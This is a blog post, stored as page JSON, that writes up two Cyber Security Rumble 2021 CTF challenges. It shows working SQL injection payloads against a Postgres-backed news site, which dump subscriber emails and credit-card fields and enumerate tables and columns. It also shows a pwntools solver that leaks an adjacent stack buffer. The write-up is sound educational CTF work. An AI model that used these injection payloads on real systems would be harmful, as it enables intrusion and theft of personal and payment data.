{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-rumblectf-2021-en","result":{"data":{"markdownRemark":{"id":"856e43fe-7b67-5de0-a286-f206387f515e","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-rumblectf-2021\">original page</a>.</p>\n</blockquote>\n<p>I participated in Cyber Security Rumble 2021 CTF, which began on 2021/11/26.</p>\n<p>I will write up a few challenges.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li>\n<p><a href=\"#stonks-street-journal-web\">Stonks Street Journal (Web)</a></p>\n<ul>\n<li><a href=\"#using-sql-injection-to-retrieve-other-users-information\">Using SQL injection to retrieve other users’ information</a></li>\n<li><a href=\"#using-sql-injection-to-explore-other-tables\">Using SQL injection to explore other tables</a></li>\n<li><a href=\"#using-sql-injection-to-explore-column-information\">Using SQL injection to explore column information</a></li>\n</ul>\n</li>\n<li><a href=\"#flag-checker-baby-pwn\">Flag Checker, Baby (Pwn)</a></li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"stonks-street-journal-web\" style=\"position:relative;\"><a href=\"#stonks-street-journal-web\" aria-label=\"stonks street journal web permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Stonks Street Journal (Web)</h2>\n<p>Accessing the website brings you to a members-only news site.</p>\n<p>When you register, the user registration itself does not complete, but you are redirected to an Invoice page where you can review the submitted information.</p>\n<p>This page is accessed via a URL like the following, and it is managed by a path that Base64-encodes the registered user and date, such as <code class=\"language-text\">username-2021-11-27</code>.</p>\n<p><code class=\"language-text\">http://ssj.rumble.host/legacy_invoice_system/dGVzdHVzZXItMjAyMS0xMS0yNw==</code></p>\n<p>Here, I tried changing either the username part or the date part into an arbitrary string that did not fit the format. That caused an SQL error, which showed that an SQL injection vulnerability existed.</p>\n<h3 id=\"using-sql-injection-to-retrieve-other-users-information\" style=\"position:relative;\"><a href=\"#using-sql-injection-to-retrieve-other-users-information\" aria-label=\"using sql injection to retrieve other users information permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Using SQL injection to retrieve other users’ information</h3>\n<p>I started by exploring information about other users in the table.</p>\n<p>It looked like UNION-based injection would work for reconnaissance.</p>\n<p>As for the name of the table that manages users, I was able to identify it as <code class=\"language-text\">news_subscriber</code> by using commands such as WHERE and HAVING to trigger error messages.</p>\n<div class=\"gatsby-highlight\" data-language=\"sql\"><pre class=\"language-sql\"><code class=\"language-sql\">Rakete<span class=\"token operator\">-</span><span class=\"token number\">2021</span><span class=\"token operator\">-</span><span class=\"token number\">11</span><span class=\"token operator\">-</span><span class=\"token number\">26</span>' <span class=\"token keyword\">UNION</span> <span class=\"token keyword\">SELECT</span> id<span class=\"token punctuation\">,</span>username<span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span>pensi<span class=\"token punctuation\">,</span>email<span class=\"token punctuation\">,</span>credit_card<span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span> <span class=\"token keyword\">FROM</span> news_subscriber <span class=\"token keyword\">WHERE</span> id<span class=\"token operator\">=</span><span class=\"token number\">10</span><span class=\"token comment\">--</span></code></pre></div>\n<p>Therefore, with a command like the one above, you can inspect user pages one by one by specifying an ID or username.</p>\n<p>Unfortunately, even after exploring the entire <code class=\"language-text\">news_subscriber</code> table, there were no users that seemed likely to lead to the flag.</p>\n<h3 id=\"using-sql-injection-to-explore-other-tables\" style=\"position:relative;\"><a href=\"#using-sql-injection-to-explore-other-tables\" aria-label=\"using sql injection to explore other tables permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Using SQL injection to explore other tables</h3>\n<p>Next, I decided to look for tables other than <code class=\"language-text\">news_subscriber</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"sql\"><pre class=\"language-sql\"><code class=\"language-sql\">Rakete<span class=\"token operator\">-</span><span class=\"token number\">2021</span><span class=\"token operator\">-</span><span class=\"token number\">11</span><span class=\"token operator\">-</span><span class=\"token number\">26</span>' <span class=\"token keyword\">UNION</span> <span class=\"token keyword\">SELECT</span> id<span class=\"token punctuation\">,</span>version<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span> <span class=\"token keyword\">FROM</span> news_subscriber</code></pre></div>\n<p>As shown above, using the <code class=\"language-text\">version()</code> command let me identify the database as Postgres.</p>\n<p>Since the database is Postgres, table information can be referenced from the <code class=\"language-text\">tablename</code> column in <code class=\"language-text\">pg_tables</code>.</p>\n<p>There are several ways to retrieve it, but if you want to enumerate them in order from the beginning, the <code class=\"language-text\">LIMIT 1 OFFSET n</code> syntax is convenient.</p>\n<p><code class=\"language-text\">LIKE</code> is also useful when you want to search for tables containing a specific string.</p>\n<div class=\"gatsby-highlight\" data-language=\"sql\"><pre class=\"language-sql\"><code class=\"language-sql\"><span class=\"token comment\"># 6番目のテーブルをSQLインジェクションで取得</span>\nRakete<span class=\"token operator\">-</span><span class=\"token number\">2021</span><span class=\"token operator\">-</span><span class=\"token number\">11</span><span class=\"token operator\">-</span><span class=\"token number\">26</span><span class=\"token string\">';SELECT null,tablename,null,null,null,null,null FROM pg_tables LIMIT 1 OFFSET 6;--\n\n# テーブル名にnameが含まれるテーブルをSQLインジェクションで取得\nRakete-2021-11-26'</span><span class=\"token punctuation\">;</span><span class=\"token keyword\">SELECT</span> <span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span>tablename<span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span> <span class=\"token keyword\">FROM</span> pg_tables <span class=\"token keyword\">WHERE</span> tablename <span class=\"token operator\">LIKE</span> <span class=\"token string\">'%name%'</span><span class=\"token punctuation\">;</span><span class=\"token comment\">--</span></code></pre></div>\n<p>Exploring tables in this way revealed one called <code class=\"language-text\">news_article</code>.</p>\n<h3 id=\"using-sql-injection-to-explore-column-information\" style=\"position:relative;\"><a href=\"#using-sql-injection-to-explore-column-information\" aria-label=\"using sql injection to explore column information permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Using SQL injection to explore column information</h3>\n<p>It looked like the flag was probably stored in the <code class=\"language-text\">news_article</code> table.</p>\n<p>So I moved on to exploring the columns of the <code class=\"language-text\">news_article</code> table.</p>\n<p>In Postgres, information about the columns of a specific table can be filtered in the form <code class=\"language-text\">information_schema.columns WHERE table_name='news_article'</code>.</p>\n<p>After that, just as when retrieving table information earlier, you can use LIMIT and LIKE to enumerate the column information, then use UNION injection to retrieve the column data and obtain the flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"sql\"><pre class=\"language-sql\"><code class=\"language-sql\">Rakete<span class=\"token operator\">-</span><span class=\"token number\">2021</span><span class=\"token operator\">-</span><span class=\"token number\">11</span><span class=\"token operator\">-</span><span class=\"token number\">26</span><span class=\"token string\">';SELECT null,column_name,null,null,null,null,null FROM information_schema.columns WHERE table_name='</span>news_article<span class=\"token string\">' AND column_name LIMIT 1 OFFSET 3;--\n\nRakete-2021-11-26'</span><span class=\"token punctuation\">;</span><span class=\"token keyword\">SELECT</span> <span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span>column_name<span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span><span class=\"token punctuation\">,</span><span class=\"token boolean\">null</span> <span class=\"token keyword\">FROM</span> information_schema<span class=\"token punctuation\">.</span><span class=\"token keyword\">columns</span> <span class=\"token keyword\">WHERE</span> table_name<span class=\"token operator\">=</span><span class=\"token string\">'news_article'</span> <span class=\"token operator\">AND</span> column_name <span class=\"token operator\">LIKE</span> <span class=\"token string\">'%te%'</span><span class=\"token comment\">--</span></code></pre></div>\n<p>Using this method, I was able to recover the flag information from the title on the Invoice page, as shown below.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 500px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/2c0394ba764763e3944aee1550b2d2b5/0b533/image-14.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 61.66666666666666%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAIAAADtbgqsAAAACXBIWXMAARlAAAEZQAGA43XUAAABK0lEQVQoz52RSW6DQBBF+/6X4gIYYhBkjcBgGWxmjIFAHl1yK86wyV+UflfXr1HVdW3btuM4h8PB933Xdd+ewPmuYVkWfsKOx2MQBETyNY6j2r5gfQLO3+12I/U0TR8a+LHzPAsHqmmaPM+LosAOwyApsGgGjWVZxAkhozyxpFBZltEYljgE22+QOijDMKQMHizxe2UYH/Tz0Ljf7zyFmLLUgUdRdL1e4Wma8qtOp1OSJOfzGQunBSLEE8dx13VGDKFa27bwsixpU1VVRY7tX1CSDCYrXV4hHnbOFFK/73vZ/77ty+XieR5XYU5zFQMikDGhiAGR6GX5itm4e64h215fIfXNCemU1cpTkZKt4JLJ1x8wXZAFGWGTxn7nb8f8686EMhfnkG1zMPSfAOyx+PIMzWgAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/2c0394ba764763e3944aee1550b2d2b5/8ac56/image-14.webp 240w,\n/static/2c0394ba764763e3944aee1550b2d2b5/d3be9/image-14.webp 480w,\n/static/2c0394ba764763e3944aee1550b2d2b5/b0a15/image-14.webp 500w\"\n              sizes=\"(max-width: 500px) 100vw, 500px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/2c0394ba764763e3944aee1550b2d2b5/8ff5a/image-14.png 240w,\n/static/2c0394ba764763e3944aee1550b2d2b5/e85cb/image-14.png 480w,\n/static/2c0394ba764763e3944aee1550b2d2b5/0b533/image-14.png 500w\"\n            sizes=\"(max-width: 500px) 100vw, 500px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/2c0394ba764763e3944aee1550b2d2b5/0b533/image-14.png\"\n            alt=\"image-14.png\"\n            title=\"image-14.png\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Reference: <a href=\"https://ctf.zeyu2001.com/2021/cybersecurityrumble-ctf/stonks-street-journal\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Stonks Street Journal - CTFs</a></p>\n<h2 id=\"flag-checker-baby-pwn\" style=\"position:relative;\"><a href=\"#flag-checker-baby-pwn\" aria-label=\"flag checker baby pwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Flag Checker, Baby (Pwn)</h2>\n<p>You are given a binary and its source code.</p>\n<p>Reading the source code shows the following behavior.</p>\n<ol>\n<li>The input string and FLAG are passed to the <code class=\"language-text\">check</code> function.</li>\n<li>If the input string is larger than 32 bytes (the size of <code class=\"language-text\">guess</code>), the function is not called.</li>\n<li>The input string is stored in the <code class=\"language-text\">guess</code> variable.</li>\n<li>FLAG is stored in the <code class=\"language-text\">flag</code> variable.</li>\n<li>The <code class=\"language-text\">flag</code> and <code class=\"language-text\">guess</code> variables are compared with <code class=\"language-text\">strcmp</code>; if they match, the flag is displayed, and if they do not match, the value of <code class=\"language-text\">guess</code> is displayed.</li>\n<li>Considering the memory layout of the local variables, <code class=\"language-text\">flag</code> is placed contiguously after <code class=\"language-text\">guess</code>.</li>\n<li>Since <code class=\"language-text\">guess</code> can accept only up to 32 bytes, by entering 32 bytes that contain no null character, the concatenated contents of <code class=\"language-text\">guess</code> and <code class=\"language-text\">flag</code> are printed by the line <code class=\"language-text\">printf(\"Wrong flag: %s\\n\", guess);</code>.</li>\n</ol>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdlib.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;string.h></span></span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">check</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">const</span> <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>input<span class=\"token punctuation\">,</span> <span class=\"token keyword\">const</span> <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>secret_flag<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\t\n\t<span class=\"token keyword\">char</span> guess<span class=\"token punctuation\">[</span><span class=\"token number\">32</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> flag<span class=\"token punctuation\">[</span><span class=\"token number\">64</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n\t<span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token function\">strlen</span><span class=\"token punctuation\">(</span>input<span class=\"token punctuation\">)</span> <span class=\"token operator\">></span> <span class=\"token keyword\">sizeof</span><span class=\"token punctuation\">(</span>guess<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n\t\t<span class=\"token function\">puts</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"HACKER!\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\t\t<span class=\"token keyword\">return</span><span class=\"token punctuation\">;</span>\n\t<span class=\"token punctuation\">}</span>\n\n\t<span class=\"token function\">strncpy</span><span class=\"token punctuation\">(</span>guess<span class=\"token punctuation\">,</span> input<span class=\"token punctuation\">,</span> <span class=\"token keyword\">sizeof</span><span class=\"token punctuation\">(</span>guess<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\t<span class=\"token function\">strncpy</span><span class=\"token punctuation\">(</span>flag<span class=\"token punctuation\">,</span> secret_flag<span class=\"token punctuation\">,</span> <span class=\"token keyword\">sizeof</span><span class=\"token punctuation\">(</span>flag<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\t<span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">!</span><span class=\"token function\">strcmp</span><span class=\"token punctuation\">(</span>guess<span class=\"token punctuation\">,</span> flag<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n\t\t<span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Well done! You got it: %s\\n\"</span><span class=\"token punctuation\">,</span> flag<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\t<span class=\"token punctuation\">}</span>\n\t<span class=\"token keyword\">else</span> <span class=\"token punctuation\">{</span>\n\t\t<span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Wrong flag: %s\\n\"</span><span class=\"token punctuation\">,</span> guess<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\t<span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> argc<span class=\"token punctuation\">,</span> <span class=\"token keyword\">char</span><span class=\"token operator\">*</span><span class=\"token operator\">*</span> argv<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n\t<span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdout</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span> _IONBF<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\t<span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span> _IONBF<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n\t<span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>secret_flag <span class=\"token operator\">=</span> <span class=\"token function\">getenv</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"FLAG\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\t<span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">!</span>secret_flag<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n\t\t<span class=\"token function\">puts</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Flag not found, contact challenge authors.\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\t\t<span class=\"token keyword\">return</span> <span class=\"token number\">1</span><span class=\"token punctuation\">;</span>\n\t<span class=\"token punctuation\">}</span>\n\n\t<span class=\"token keyword\">char</span> input<span class=\"token punctuation\">[</span><span class=\"token number\">128</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n\t<span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Enter the flag: \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\t<span class=\"token function\">fgets</span><span class=\"token punctuation\">(</span>input<span class=\"token punctuation\">,</span> <span class=\"token keyword\">sizeof</span><span class=\"token punctuation\">(</span>input<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">stdin</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\t<span class=\"token function\">check</span><span class=\"token punctuation\">(</span>input<span class=\"token punctuation\">,</span> secret_flag<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n\t<span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>This solver can recover the FLAG.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n<span class=\"token keyword\">import</span> binascii\n<span class=\"token keyword\">import</span> time\n\nelf <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span><span class=\"token string\">\"./chall\"</span><span class=\"token punctuation\">)</span>\ncontext<span class=\"token punctuation\">.</span>binary <span class=\"token operator\">=</span> elf\n\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"\\x41\"</span><span class=\"token operator\">*</span><span class=\"token number\">31</span>\n\n<span class=\"token comment\"># Local</span>\np <span class=\"token operator\">=</span> process<span class=\"token punctuation\">(</span><span class=\"token string\">\"./chall\"</span><span class=\"token punctuation\">)</span>\n<span class=\"token comment\"># p = remote(\"challs.rumble.host\", 53921)</span>\n\nr <span class=\"token operator\">=</span> p<span class=\"token punctuation\">.</span>recv<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\np<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\np<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>Reference: <a href=\"https://github.com/aly-ab/CTF-writeups/blob/main/notes/cybersecurityrumble/Pwn%20-%20Flag%20Checker%2C%20Baby.md\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">CTF-writeups/Pwn - Flag Checker, Baby.md at main · aly-ab/CTF-writeups</a></p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>There was a Linux Game challenge in Rev that I really wanted to solve somehow, but in the end I could not.</p>\n<p>I still have no idea because I cannot find a writeup, but if I do find one, I think I will update this article.</p>","fields":{"slug":"/ctf-rumblectf-2021-en","tagSlugs":["/tag/ctf-en/","/tag/web-en/","/tag/pwn-en/","/tag/english/"]},"frontmatter":{"date":"2021-11-30","description":"A writeup from Cyber Security Rumble CTF 2021, held from November 26, 2021.","tags":["CTF (en)","Web (en)","Pwn (en)","English"],"title":"Cyber Security Rumble CTF 2021 Writeup","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/ctf-rumblectf-2021-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}